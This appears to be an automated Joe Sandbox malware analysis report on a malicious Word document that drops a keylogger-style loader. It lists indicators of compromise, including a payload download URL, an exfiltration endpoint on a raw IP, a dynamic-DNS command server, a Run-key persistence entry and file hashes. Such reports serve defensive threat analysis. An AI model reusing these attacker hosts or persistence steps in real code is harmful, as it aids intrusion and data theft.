                                                                                                        https://ac.ecosia.org/autocomplete?q=npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://amazonenviro.com/245_Nsltarpncon4brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://e6.i.lencr.org/0npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616339150.0000000023771000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://51.38.247.67:8081/_send_.php?LnpratlsN.pif, 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003438B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://anotherarmy.dns.army:8081npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.000000002095E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://reallyfreegeoip.orgnpratlsN.pif, 0000000E.00000002.3083897007.0000000034281000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020934000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.verisign.npratlsN.pif, 0000000E.00000002.3095136706.00000000368D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://x1.c.lencnpratlsN.pif, 0000000E.00000002.3080226661.0000000032432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://chrome.google.com/webstore?hl=enLznpratlsN.pif, 00000008.00000002.3076785533.0000000028C2E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesnpratlsN.pif, 00000008.00000003.2441941457.0000000029CA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D1B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CD3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AD2000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AA7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B1C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003539B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035237000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000354F1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003560E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353C6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035410000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.00000000218E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021CBE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A76000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 
00000012.00000002.3078285306.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.office.com/LznpratlsN.pif, 00000008.00000002.3076785533.0000000028C5F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://ocsp.sectigo.com0Cbrightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodednpratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
166.62.27.188 | amazonenviro.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
46.151.208.21 | mail.irco.com.sa | Saudi Arabia | 51975 | NASHIRNET-ASNNASHIRNETASNSA | true
188.114.97.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
147.124.216.113 | unknown | United States | 1432 | AC-AS-1US | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584674
Start date and time:2025-01-06 07:52:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:PI ITS15235.doc
Detection:MAL
Classification:mal100.troj.spyw.expl.evad.winDOC@24/10@6/7
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 187
• Number of non-executed functions: 81
Cookbook Comments:
• Found application associated with file extension: .doc
                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                • Attach to Office via COM
                                                                                                                                • Scroll down
                                                                                                                                • Close Viewer
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 184.28.90.27, 51.132.193.104, 52.111.243.43, 52.111.243.42, 52.111.243.41, 52.111.243.40, 95.100.110.68, 95.100.110.78, 52.109.28.47, 20.190.159.68, 20.12.23.50, 13.107.246.45
                                                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprduks02.uksouth.cloudapp.azure.com, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, neu-azsc-config.officeapps.live.com, nleditor.osi.office.net, e26769.dscb.akamaiedge.net, uks-azsc-000.roamin
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:53:16 | API Interceptor | 2x Sleep call for process: brightness.exe modified
01:53:26 | API Interceptor | 1784500x Sleep call for process: npratlsN.pif modified
01:53:31 | API Interceptor | 4x Sleep call for process: Nsltarpn.PIF modified
06:53:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nsltarpn C:\Users\Public\Nsltarpn.url
06:53:30 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nsltarpn C:\Users\Public\Nsltarpn.url
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    test.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 130.61.86.87
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    Hilix.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 140.238.15.187
                                                                                                                                                    AS-26496-GO-DADDY-COM-LLCUSfuckunix.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 50.62.7.191
                                                                                                                                                    Josho.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 72.167.237.175
                                                                                                                                                    DRlFlg7OV8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 166.62.28.147
                                                                                                                                                    arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                    • 192.169.229.195
                                                                                                                                                    db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                    • 148.72.251.75
                                                                                                                                                    https://chamberoflearning.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU1uZ3phbkk9JnVpZD1VU0VSMTcxMjIwMjRVNTkxMjE3Mjk=N0123NCA_A8_CHF@emfa.ptGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 216.69.174.68
                                                                                                                                                    https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 68.178.157.109
                                                                                                                                                    armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 192.186.210.173
                                                                                                                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 68.178.185.215
                                                                                                                                                    nabarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 198.71.185.150
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adkP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0ekP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    ny9LDJr6pA.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    jaTDEkWCbs.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1un30brGAKP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Patcher_I5cxa9AN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    CrosshairX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Installer_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Insomia.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Aura.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    C:\Users\Public\Libraries\npratlsN.pifPO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      HSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                        PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                  RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                    Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                      F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):8556
                                                                                                                                                                        Entropy (8bit):4.623706637784657
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                                                                        MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                                                                        SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                                                                        SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                                                                        SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):46543
                                                                                                                                                                        Entropy (8bit):4.705001079878445
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                                                                        MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                                                                        SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                                                                        SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                                                                        SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):587005
                                                                                                                                                                        Entropy (8bit):7.97982343807899
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12288:7uJf6JY7FoblH0FkRaIHJ4tw0nCdxeJSRrUe9dZA:74f6q7Fw4Ga1twkqxegRoE0
                                                                                                                                                                        MD5:C7A8C9CCD0074118575324C6AD87285B
                                                                                                                                                                        SHA1:5FEE525990BE478BD0DD9C38BB65315A1140190C
                                                                                                                                                                        SHA-256:D228F49F052E95B267E4DAB42958B8A039884A42C03857B3928C48F311FE3DFD
                                                                                                                                                                        SHA-512:D10673B750FF592EFB0BD0A5DD5A9260AB1ACB33635D1985DEAB716BAE20C1C7F9195EF6208DA7EAEE8F97C2A6B5832AB9DAA593FDC78A32268CC993E8B7771E
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1161216
                                                                                                                                                                        Entropy (8bit):7.248914742573976
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                                                                                                                                                                        MD5:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        SHA1:377F83F54D1226A181F265557804001CB9DEEE6A
                                                                                                                                                                        SHA-256:1BEC44AA19EA8DAA0B7151B312975F3F753E03F0BBCE5EBEAB8DFDA5FB736A91
                                                                                                                                                                        SHA-512:384B92D7ECBD8C5242815CB8EC6BCE0096412D2F558C61C4C91A5AFF38D3DA8CF297D40362B91C1F4620D02700954FBEE71519E4735EE4BD17413EE491220FD7
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):175800
                                                                                                                                                                        Entropy (8bit):6.631791793070417
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                                                        MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                                                        SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                                                        SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                                                        SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: PO#5_Tower_049.bat, Detection: malicious, Browse
                                                                                                                                                                        • Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: PO_B2W984.com, Detection: malicious, Browse
